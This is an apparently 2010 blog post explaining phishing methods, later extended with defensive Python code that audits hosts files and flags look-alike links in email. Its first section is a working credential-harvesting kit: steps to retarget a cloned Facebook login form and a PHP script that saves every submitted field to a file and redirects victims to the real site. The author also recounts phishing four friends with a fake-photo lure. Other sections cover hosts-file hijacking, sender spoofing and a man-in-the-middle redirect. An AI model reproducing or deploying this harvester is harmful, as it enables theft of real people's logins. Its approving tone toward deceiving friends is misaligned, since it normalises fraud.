Phishing

April 6, 2010


The term "phishing" comes from "fishing" with the well-known "ph" prefix, as in "phreaks": it traces back to the early hackers involved in "phreaking", the hacking of telephone systems. Phishing, also referred to as brand spoofing or carding, is a variation on "fishing": bait is thrown out in the hope that, while most will ignore it, some will be tempted into biting.

Nowadays it is mostly explained as a blend of "password" and "fishing", and it has been called the crime of the 21st century. Phishing is basically a form of online identity theft that combines trickery, social engineering and technical means to steal user credentials such as usernames and passwords. Over time the definition has blurred and expanded: the term no longer covers only the theft of account details but the theft of any personal or financial data. What originally meant tricking users into replying to emails with passwords and credit card details now includes fake websites, the installation of Trojan horse keyloggers and screen grabbers, and man-in-the-middle data proxies, delivered through any electronic communication channel.
 

Where can Phishing take place?

Phishing is delivered through web pages, spam email, IRC, instant messaging services and look-alike domain names, and most often impersonates sites like eBay, PayPal, Facebook, Twitter, MySpace, etc.

Methods of Phishing

1. Hosting a web page

A fake website with exactly the same content as the legitimate one is created and hosted under a look-alike domain name such as "payepal.com" or "faceb00k.com" (here the letter "o" is replaced with the digit "0"), or some similar name. The source code of the original site is copied, modified and hosted.

This is the login form from the Facebook login page of the time (the parts that matter are the method and the action):

    <form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit=";var d = document.documentElement;return d.onsubmit && d.onsubmit(event);">

In the copied page it is modified so that the form posts to the phisher's own script instead (the method is changed to GET so that the fields arrive in $_GET):

    <form method="GET" action="post.php" id="login_form" onsubmit=";var d = document.documentElement;return d.onsubmit && d.onsubmit(event);">

and in post.php the following code is written:

    <?php
    // Send the victim on to the real site so that nothing looks wrong.
    header("Location: http://www.facebook.com");

    // Append every submitted field (email, pass, ...) to a text file.
    $handle = fopen("passes.txt", "a");
    foreach ($_GET as $variable => $value) {
        fwrite($handle, $variable);
        fwrite($handle, "=");
        fwrite($handle, $value);
        fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>

The line header("Location: http://www.facebook.com"); sets where the fake login page redirects after the credentials have been captured, so the victim lands on the real site and usually assumes the first login attempt simply failed. (Because the form now uses GET, the username and password also end up in the query string, and therefore in the phisher's web server logs.) With this method a phisher can clone any site, Facebook, Gmail, PayPal or a bank, and abuse the personal information. I had created a Facebook page when I learnt phishing and sent the link to four of my close friends, and guess what, my hit ratio was 100%: I had said "check out my new girlfriend's photos" and they got so curious that they did not care about their password. So beware when you click on a link: "THINK BEFORE YOU LINK".
 

2. Social Engineering

Phishing attacks are usually a combination of technical and social engineering practices. In the majority of cases the phisher persuades the victim to perform a series of actions that will provide access to confidential information. In almost all cases the phisher poses as a trusted source, e.g. the helpdesk of their bank or an automated support response from their favourite online retailer; beyond that, the phisher has many other ways of social engineering victims into surrendering confidential information.

In the real example below, the email recipient is likely to believe that their banking details have been used by someone else to purchase unauthorised services. The victim would then try to contact the email sender to report the mistake and cancel the transaction. Depending on the details of the scam, the phisher would then ask for, or provide a "secure" web page for, the recipient's confidential details such as address, credit card number, security code, etc., supposedly to reverse the transaction. This confirms that the email address is live (information that is then passed on to other spammers) and captures enough information to complete a real transaction.

3. HOSTS file modification

The hosts file, located at C:\Windows\System32\drivers\etc\hosts on Windows (and /etc/hosts on Unix-like systems), is used by the operating system to map hostnames to IP addresses before DNS is consulted, so a given site name can be pointed at some other server. This lets a phisher phish in a smart way without raising much doubt in the user's mind: an entry that maps twitter.com to the phisher's server means the victim types twitter.com, sees twitter.com in the address bar, and is still served the fake page, with no look-alike name such as twiitter.com to give the game away. A phisher can modify the hosts file through malware or through web-based programs, thereby redirecting a legitimate website to a fake one.
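A practitioner's first check against this technique is to audit the hosts file for entries that override well-known sites. The following is an added example (not code from the original post): it parses hosts-file syntax, ignores comments, and reports any mapping for a watched domain, distinguishing a redirect to a remote address (the phishing case) from a mapping to loopback or 0.0.0.0 (which merely blocks the site). The watched-domain list and the sample file content are constructed for illustration.

```python
"""Audit a hosts file for entries that hijack well-known sites.
Added example, not part of the original post. The WATCHED list and
SAMPLE_HOSTS below are constructed for illustration."""
import ipaddress
import os
from typing import List, Optional, Tuple

# Domains a phisher would want to redirect (assumed list; extend as needed).
WATCHED = {"twitter.com", "facebook.com", "paypal.com", "ebay.com", "icicibank.com"}


def parse_hosts(text: str) -> List[Tuple[str, str, int]]:
    """Return (ip, hostname, line_no) for every mapping; comments are ignored."""
    entries = []
    for no, line in enumerate(text.splitlines(), 1):
        line = line.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        ip, names = parts[0], parts[1:]
        for name in names:  # one address may carry several names
            entries.append((ip, name.lower().rstrip("."), no))
    return entries


def registrable(host: str) -> str:
    """www.twitter.com -> twitter.com (last two labels; good enough here)."""
    return ".".join(host.split(".")[-2:])


def suspicious(entries: List[Tuple[str, str, int]]) -> List[Tuple[int, str, str, str]]:
    """Report every watched domain found in the hosts file, with a verdict."""
    findings = []
    for ip, name, no in entries:
        if registrable(name) not in WATCHED:
            continue
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings.append((no, name, ip, "malformed address"))
            continue
        if addr.is_loopback or addr.is_unspecified:
            findings.append((no, name, ip, "site blocked"))
        else:
            findings.append((no, name, ip, "redirected away from DNS"))
    return findings


def default_hosts_path() -> str:
    if os.name == "nt":
        root = os.environ.get("SystemRoot", r"C:\Windows")
        return os.path.join(root, r"System32\drivers\etc\hosts")
    return "/etc/hosts"


def check_hosts_file(path: Optional[str] = None) -> List[Tuple[int, str, str, str]]:
    """Run the audit against a real hosts file (defaults to the platform path)."""
    with open(path or default_hosts_path(), encoding="utf-8", errors="replace") as fh:
        return suspicious(parse_hosts(fh.read()))


# Constructed sample: a stock Windows header plus two planted entries.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example.net                 # ad-blocker entry, harmless
203.0.113.7     twitter.com www.twitter.com     # planted phishing redirect
127.0.0.1       facebook.com                    # planted block
"""

if __name__ == "__main__":
    for no, name, ip, verdict in suspicious(parse_hosts(SAMPLE_HOSTS)):
        print(f"line {no}: {name} -> {ip}: {verdict}")
```

On a live machine call check_hosts_file(); any hit for a banking or social-networking domain deserves a look at what wrote the file, since a normal hosts file carries nothing but localhost entries.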
 

4. Emails and spam

Phishing attacks by email are very common. Using the techniques and tools of spammers, phishers can send emails to millions of legitimate email addresses within a few hours, or within minutes using distributed Trojan networks (botnets). Address lists are sold by various people, sometimes even by reputable domains, and that is where spammers get the email addresses they use for criminal activities.

Phishers exploit the fact that the mail transfer protocol (SMTP) does not authenticate the sender: both the envelope "MAIL FROM" and the "From:" header can be set to any address, so a message can be made to appear to come from any organisation. (Receiving servers that check SPF or DKIM can detect some of these forgeries, but in 2010 many do not.)

Methods used in phishing emails:

    * Imitation of legitimate corporate emails with minor URL changes
    * Malware attachments to emails
    * Official-looking emails
    * Fake posts to message boards and mailing lists

A real-life email phishing example:

This is a mail I received, telling me to verify my identity immediately as part of a routine security check and to click on a link to update my details; the link actually leads to a phishing site. It also warns that if I fail to do so the account will be blocked, as it would then be assumed not to belong to me. The address the mail is sent from also sounds professional, admin@ncua.gov, so a user may well follow the procedure and give away their personal information. Most attacks of this kind target bank accounts, and at times they succeed.
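The two indicators that give such a mail away can be checked mechanically: a link whose visible text names one site while its href points at another, and a target host that merely looks like the brand it impersonates (the "faceb00k.com" and "payepal.com" trick from section 1, or a brand name buried as a subdomain of some unrelated domain). The following is an added example, not code from the original post: it parses a constructed message modelled on the one described above, extracts the links from the HTML part, and reports both kinds of mismatch. The PROTECTED brand list, the confusable-character table and the sample message are assumptions made for the illustration.

```python
"""Flag phishing indicators in an email: href/text host mismatches and
look-alike hosts. Added example, not part of the original post; PROTECTED,
CONFUSABLES and SAMPLE are constructed for illustration."""
import email
import re
from email import policy
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Brands the check protects (assumed list; extend for your environment).
PROTECTED = {"facebook.com", "paypal.com", "twitter.com", "ncua.gov"}
# Characters typically swapped in look-alike names (zero for o, one for l, ...).
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "@": "a"})


def registrable(host: str) -> str:
    """login.facebook.com -> facebook.com (last two labels; enough for this demo)."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: catches payepal.com, faceb0ok.com and friends."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(host: str) -> Optional[str]:
    """Return the protected brand this host imitates, or None for the brand
    itself or for an unrelated host."""
    reg = registrable(host)
    if reg in PROTECTED:
        return None
    norm = reg.translate(CONFUSABLES).replace("rn", "m")  # rn looks like m
    labels = host.lower().split(".")
    for brand in PROTECTED:
        if norm == brand or edit_distance(norm, brand) <= 1:
            return brand
        if brand.split(".")[0] in labels:  # brand used as a subdomain label
            return brand
    return None


class LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs from an HTML body."""

    def __init__(self) -> None:
        super().__init__()
        self.links: List[Tuple[str, str]] = []
        self._href: Optional[str] = None
        self._text: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def analyse(raw: str) -> List[str]:
    """Return one finding per suspicious link in the message's HTML part."""
    msg = email.message_from_string(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("html",))
    findings: List[str] = []
    if body is None:
        return findings
    parser = LinkCollector()
    parser.feed(body.get_content())
    for href, text in parser.links:
        host = urlparse(href).hostname or ""
        brand = lookalike_of(host)
        if brand:
            findings.append(f"look-alike host {host} imitates {brand}")
        shown = re.search(r"https?://([^/\s]+)", text)  # text that is itself a URL
        if shown and registrable(shown.group(1)) != registrable(host):
            findings.append(f"link text shows {shown.group(1)} but goes to {host}")
    return findings


# Constructed sample modelled on the mail described in the post.
SAMPLE = """\
From: NCUA Support <admin@ncua.gov>
To: victim@example.org
Subject: Routine security check - verify your identity
Content-Type: text/html; charset="utf-8"

<html><body>
<p>As part of a routine security check you must verify your account
immediately or it will be blocked.</p>
<p>Click <a href="http://faceb00k.com/login.php">https://www.facebook.com/login</a>
to continue, or use <a href="http://www.ncua.gov.evil.example/verify">our secure page</a>.</p>
</body></html>
"""

if __name__ == "__main__":
    for finding in analyse(SAMPLE):
        print(finding)
```

The edit-distance threshold of one and the subdomain-label rule are deliberately aggressive: they will also flag a legitimate "paypal.partner.example" style host, which is acceptable for a mail filter that only raises a warning.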

5. IRC and Instant messaging

IRC and instant messaging are very popular communication channels today. IRC and IM clients allow users to send embedded dynamic content, so many web-based phishing attacks can be carried out there as well. Bots (automated programs that listen to and take part in group discussions) are common in many popular channels, so it is now very easy for a phisher to anonymously send related links and fake information to probable victims.

6. Man-in-the-middle attack

In a man-in-the-middle attack (MITM) the attacker makes independent connections with the victims and relays messages between them, making them believe they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. For phishing, the phisher intercepts the victim's GET request with a tool like Paros and answers it with a redirect to the phishing page. For example, you request icicibank.com, the attacker captures that GET request and sends you to icici.evil.com instead. This works straightforwardly against plain HTTP; against HTTPS the attacker has to present a certificate for icicibank.com that the browser does not trust, so a certificate warning is the sign to watch for.

7. Report Phishing
